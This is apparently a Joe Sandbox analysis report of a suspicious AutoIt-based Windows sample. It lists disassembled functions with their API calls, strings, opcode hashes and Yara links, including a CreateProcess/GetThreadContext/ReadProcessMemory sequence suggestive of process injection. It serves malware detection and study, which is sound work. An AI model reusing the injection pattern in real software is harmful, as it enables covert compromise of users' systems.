                            Function 0009C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0009C948,SwapMouseButtons,00000004,?), ref: 0009C979
                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0009C948,SwapMouseButtons,00000004,?,?,?,?,0009BF22), ref: 0009C99A
                            • RegCloseKey.KERNEL32(00000000,?,?,0009C948,SwapMouseButtons,00000004,?,?,?,?,0009BF22), ref: 0009C9BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 3677997916-824357125
                            • Opcode ID: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
                            • Instruction ID: a99ea9cfece38967a51fbe5bce4fc1baf48e69987cd980c56028ae3c73c09103
                            • Opcode Fuzzy Hash: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
                            • Instruction Fuzzy Hash: D8113C75911208BFEF218FA4DC48EBE77F8EF05744F10445AB945E7214D6719E50AB60
                            Function 00A50C48 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessW.KERNEL32(?,00000000), ref: 00A51403
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A51499
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00A514BB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                            • String ID:
                            • API String ID: 2438371351-0
                            • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                            • Instruction ID: 3f107023db818ea8ea50f8daa60d1945ed9480d03cc6757f81f30df45441038d
                            • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                            • Instruction Fuzzy Hash: 8D620A30A142589BEB24CFA4C841BEEB376FF58301F1091A9D50DEB390E7799E85CB59
                            Function 000CCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000841A7: _fseek.LIBCMT ref: 000841BF
                              • Part of subcall function 000CCE59: _wcscmp.LIBCMT ref: 000CCF49
                              • Part of subcall function 000CCE59: _wcscmp.LIBCMT ref: 000CCF5C
                            • _free.LIBCMT ref: 000CCDC9
                            • _free.LIBCMT ref: 000CCDD0
                            • _free.LIBCMT ref: 000CCE3B
                              • Part of subcall function 000A28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,000A8715,00000000,000A88A3,000A4673,?), ref: 000A28DE
                              • Part of subcall function 000A28CA: GetLastError.KERNEL32(00000000,?,000A8715,00000000,000A88A3,000A4673,?), ref: 000A28F0
                            • _free.LIBCMT ref: 000CCE43
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                            • String ID:
                            • API String ID: 1552873950-0
                            • Opcode ID: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                            • Instruction ID: 07331a2a56a8c0bc922fb3eb00b18653883a97aaf1f50a595630236b871ecf29
                            • Opcode Fuzzy Hash: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                            • Instruction Fuzzy Hash: A6512EB1904219AFDF159F64CC81BEEB7B9BF49300F1040AEF65DA3252DB715A808F69
                            Function 00083BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000F3CF1
                            • GetOpenFileNameW.COMDLG32(?,?,00000001,001422E8), ref: 000F3D35
                              • Part of subcall function 000831B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 000831DA
                              • Part of subcall function 00083A67: SHGetMalloc.SHELL32(00083C31), ref: 00083A7D
                              • Part of subcall function 00083A67: SHGetDesktopFolder.SHELL32(?), ref: 00083A8F
                              • Part of subcall function 00083A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00083AD2
                              • Part of subcall function 00083B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,001422E8,?), ref: 00083B65
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                            • String ID: X
                            • API String ID: 3714316930-3081909835
                            • Opcode ID: 40ce8eb9fc8f35cf303dfdaa033fc711991c2dc7e1e92f976e0464105bfdd0ae
                            • Instruction ID: 7016dba5c58a8569e66c58dab837cdbdffb1ec741e9478046455d9b6943fc29e
                            • Opcode Fuzzy Hash: 40ce8eb9fc8f35cf303dfdaa033fc711991c2dc7e1e92f976e0464105bfdd0ae
                            • Instruction Fuzzy Hash: B411CAB1A10288ABCF05EFD4D8056DEBBF9BF85B04F008009E551BB242DBB54649CBA5
                            Function 000CD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            • GetTempPathW.KERNEL32(00000104,?), ref: 000CD01E
                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 000CD035
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Temp$FileNamePath
                            • String ID: aut
                            • API String ID: 3285503233-3010740371
                            • Opcode ID: b5b33a744edc1a75d13099ccdcb9e4b0cdf24d3f46398a0bb929347ea7507171
                            • Instruction ID: 8a4823d18946ede76ebb09a01ebe9df4e1ef2102357935e4a10b116ae406ed10
                            • Opcode Fuzzy Hash: b5b33a744edc1a75d13099ccdcb9e4b0cdf24d3f46398a0bb929347ea7507171
                            • Instruction Fuzzy Hash: 80D05EB154030EBBDB10ABA0ED0EF99776CA700709F1081907654D10D1D7F0D6858BA4
                            Function 000DF79F Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a0cdf697802018cb91cfe8dd5715f30b1d2e3a64cc343eec2b27cdff07fc4724
                            • Instruction ID: 29c128ae7ce8836ff1fc86e18c43f7ea28a123e4e252109714ced71d10c07d9a
                            • Opcode Fuzzy Hash: a0cdf697802018cb91cfe8dd5715f30b1d2e3a64cc343eec2b27cdff07fc4724
                            • Instruction Fuzzy Hash: CDF16C716047029FC710DF28C580BAAB7E5BF88314F14892EF99A9B392D771E945CF92
                            Function 00083A67 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • SHGetMalloc.SHELL32(00083C31), ref: 00083A7D
                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00083AD2
                            • SHGetDesktopFolder.SHELL32(?), ref: 00083A8F
                              • Part of subcall function 00083B1E: _wcsncpy.LIBCMT ref: 00083B32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: DesktopFolderFromListMallocPath_wcsncpy
                            • String ID:
                            • API String ID: 3981382179-0
                            • Opcode ID: ac44beda6a75aad244f09d081e414d96db5445820882c86690c7cf7a1e63e603
                            • Instruction ID: e381949a0fdef56bfc57c3f33d247e48f5a696689ce8b9e207f41923504cfeef
                            • Opcode Fuzzy Hash: ac44beda6a75aad244f09d081e414d96db5445820882c86690c7cf7a1e63e603
                            • Instruction Fuzzy Hash: D9214C76B00118ABCB14EF95DC88DEEB7BDEF88700B1040A9F64AD7255DB709E46CB90
                            Function 00083598 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000835BE
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00083667
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: IconNotifyShell__memset
                            • String ID:
                            • API String ID: 928536360-0
                            • Opcode ID: 05679f24cc0a585679a0d27695e12efac13f09079903809ba75b56d45d2c929b
                            • Instruction ID: ea5cba71b85694c7061632edfae38304cc7c9e80889075d594c75395da3f0334
                            • Opcode Fuzzy Hash: 05679f24cc0a585679a0d27695e12efac13f09079903809ba75b56d45d2c929b
                            • Instruction Fuzzy Hash: E93150B4504701AFC761EF78D845697BBE4FB89708F00092EF6DA83751E771AA88CB52
                            Function 000A45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __FF_MSGBANNER.LIBCMT ref: 000A4603
                              • Part of subcall function 000A8E52: __NMSG_WRITE.LIBCMT ref: 000A8E79
                              • Part of subcall function 000A8E52: __NMSG_WRITE.LIBCMT ref: 000A8E83
                            • __NMSG_WRITE.LIBCMT ref: 000A460A
                              • Part of subcall function 000A8EB2: GetModuleFileNameW.KERNEL32(00000000,00140312,00000104,?,00000001,000A0127), ref: 000A8F44
                              • Part of subcall function 000A8EB2: ___crtMessageBoxW.LIBCMT ref: 000A8FF2
                              • Part of subcall function 000A1D65: ___crtCorExitProcess.LIBCMT ref: 000A1D6B
                              • Part of subcall function 000A1D65: ExitProcess.KERNEL32 ref: 000A1D74
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            • RtlAllocateHeap.NTDLL(00A00000,00000000,00000001,?,?,?,?,000A0127,?,0008125D,00000058,?,?), ref: 000A462F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                            • String ID:
                            • API String ID: 1372826849-0
                            • Opcode ID: aa7657af1c807b4a751c0424e4b94492cca53492c3fabfd6d62d54e43af8dbaa
                            • Instruction ID: 1c32e169e0352ce052a349c76a17345db1ae16a6c6ba2ae4bc5e423557c1b6af
                            • Opcode Fuzzy Hash: aa7657af1c807b4a751c0424e4b94492cca53492c3fabfd6d62d54e43af8dbaa
                            • Instruction Fuzzy Hash: 2501B539601201AAE6353BF5EC42ABE7388AFC7765F114525F6059B1D3DFF09C808666
                            Function 000CCFC8 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,000CCC71,?,?,?,?,?,00000004), ref: 000CCFE1
                            • SetFileTime.KERNEL32(00000000,?,00000000,?,?,000CCC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 000CCFF7
                            • CloseHandle.KERNEL32(00000000,?,000CCC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CCFFE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleTime
                            • String ID:
                            • API String ID: 3397143404-0
                            • Opcode ID: 38539d6eece43f6f1b7f277dc800c2c618f1b4a4b7009828aef4adf1924ff762
                            • Instruction ID: 46359461b653b5efd1c3836d77e29acb6367f8ba5f7dffaae00d2240bf0383c9
                            • Opcode Fuzzy Hash: 38539d6eece43f6f1b7f277dc800c2c618f1b4a4b7009828aef4adf1924ff762
                            • Instruction Fuzzy Hash: 80E08632140218B7D7311B94BC09FCE7B19AB05770F104110FB54690E08BF165519798
                            Function 000CC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 000CC45E
                              • Part of subcall function 000A28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,000A8715,00000000,000A88A3,000A4673,?), ref: 000A28DE
                              • Part of subcall function 000A28CA: GetLastError.KERNEL32(00000000,?,000A8715,00000000,000A88A3,000A4673,?), ref: 000A28F0
                            • _free.LIBCMT ref: 000CC46F
                            • _free.LIBCMT ref: 000CC481
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                            • Instruction ID: 7c6709d7c1110af65b0414410ed649d3977c8842d0063d1499464088789c7ba5
                            • Opcode Fuzzy Hash: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                            • Instruction Fuzzy Hash: B9E017A160270196EA6CABBDA854FFB63CC6F06761B14883EF44DD7183DF2CE8408138
                            Function 0009058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID: CALL
                            • API String ID: 0-4196123274
                            • Opcode ID: b5dac53f51f2200d40789e572841718ba36947b161886e54c38c8514da86bcce
                            • Instruction ID: 1807859196ce7ddb2d8eba7920b8f8f3eb1166b885a40de8139222eb46544733
                            • Opcode Fuzzy Hash: b5dac53f51f2200d40789e572841718ba36947b161886e54c38c8514da86bcce
                            • Instruction Fuzzy Hash: F4226C70608341DFDB24DF24C490AAAB7E1FF85304F15896DE99A8B662D731E885EF42
                            Function 0008131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000816F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000814EB), ref: 00081751
                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0008159B
                            • CoInitialize.OLE32(00000000), ref: 00081612
                            • CloseHandle.KERNEL32(00000000), ref: 000F58F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Handle$CloseInitializeMessageRegisterWindow
                            • String ID:
                            • API String ID: 3815369404-0
                            • Opcode ID: 29b8c7a73aff6bbe9defe8bba1933cc8e455999216a9d05868d06027614fc336
                            • Instruction ID: 1247f00dc3479cd3a17c08d95b1d6d1efc2c6025302c85cf789876b42d848ad4
                            • Opcode Fuzzy Hash: 29b8c7a73aff6bbe9defe8bba1933cc8e455999216a9d05868d06027614fc336
                            • Instruction Fuzzy Hash: 0E71DABC981344BBC304EF6AFA90494BBE9FB4A354798422ED04A9BA72DB7044C5CF15
                            Function 00084010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: EA06
                            • API String ID: 4104443479-3962188686
                            • Opcode ID: be0a5d12efde059816c5021ade233ef5795a7a78940f727b4310bfbe5e2b5b56
                            • Instruction ID: c9a956c10bf2b38db94d74e64ec78eb361daed12632a0ce6396a647e4185c3bb
                            • Opcode Fuzzy Hash: be0a5d12efde059816c5021ade233ef5795a7a78940f727b4310bfbe5e2b5b56
                            • Instruction Fuzzy Hash: FB415E21A0825A97CF21BB548C957FF7FE2BB55300F284575EAC2D7283D6318DC48BA1
                            Function 000834C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                            Download Yara Rule
                            Strings
                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 000F34AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                            • API String ID: 1029625771-2684727018
                            • Opcode ID: bead1c96d89b31b02b68ec6f6c23126cef61f29dfb730415c1aa5fbb6232ed48
                            • Instruction ID: 0f709a93b5b730553735292f9db789da7d3ff17a0771c86f17e2f1c83b0f558c
                            • Opcode Fuzzy Hash: bead1c96d89b31b02b68ec6f6c23126cef61f29dfb730415c1aa5fbb6232ed48
                            • Instruction Fuzzy Hash: BFF0447190120DAA8F11FFA4D8919FFB7B8BB50310B108526E85592183EB34AB09DB20
                            Function 000A35E7 Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • _memmove.LIBCMT ref: 000A367B
                            • __flush.LIBCMT ref: 000A369B
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __flush__getptd_noexit_memmove
                            • String ID:
                            • API String ID: 3662107617-0
                            • Opcode ID: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                            • Instruction ID: 59127bdfcd15d49f57e53b47b849ecfb4d48785d300f1ad50d25e50e3e8d2c8e
                            • Opcode Fuzzy Hash: 9e5238af4f93087f8e5510cddb81ebd4f4ffd6b6554c3a66413832ef0355d351
                            • Instruction Fuzzy Hash: 8F41A2B5704606AFDF688EE9C8815AE7BE5AB46360B24C63DF845C7250DB70DF408B40
                            Function 0008BBD9 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
                            • Instruction ID: cb005fa94baa1c50f25a9bdb5e92eec6b9a13014a3ed53f01ebb8d30299ed7ea
                            • Opcode Fuzzy Hash: 133b38695466df121deeaeea8cbe640b9a56e9704eac05184d143640a7114888
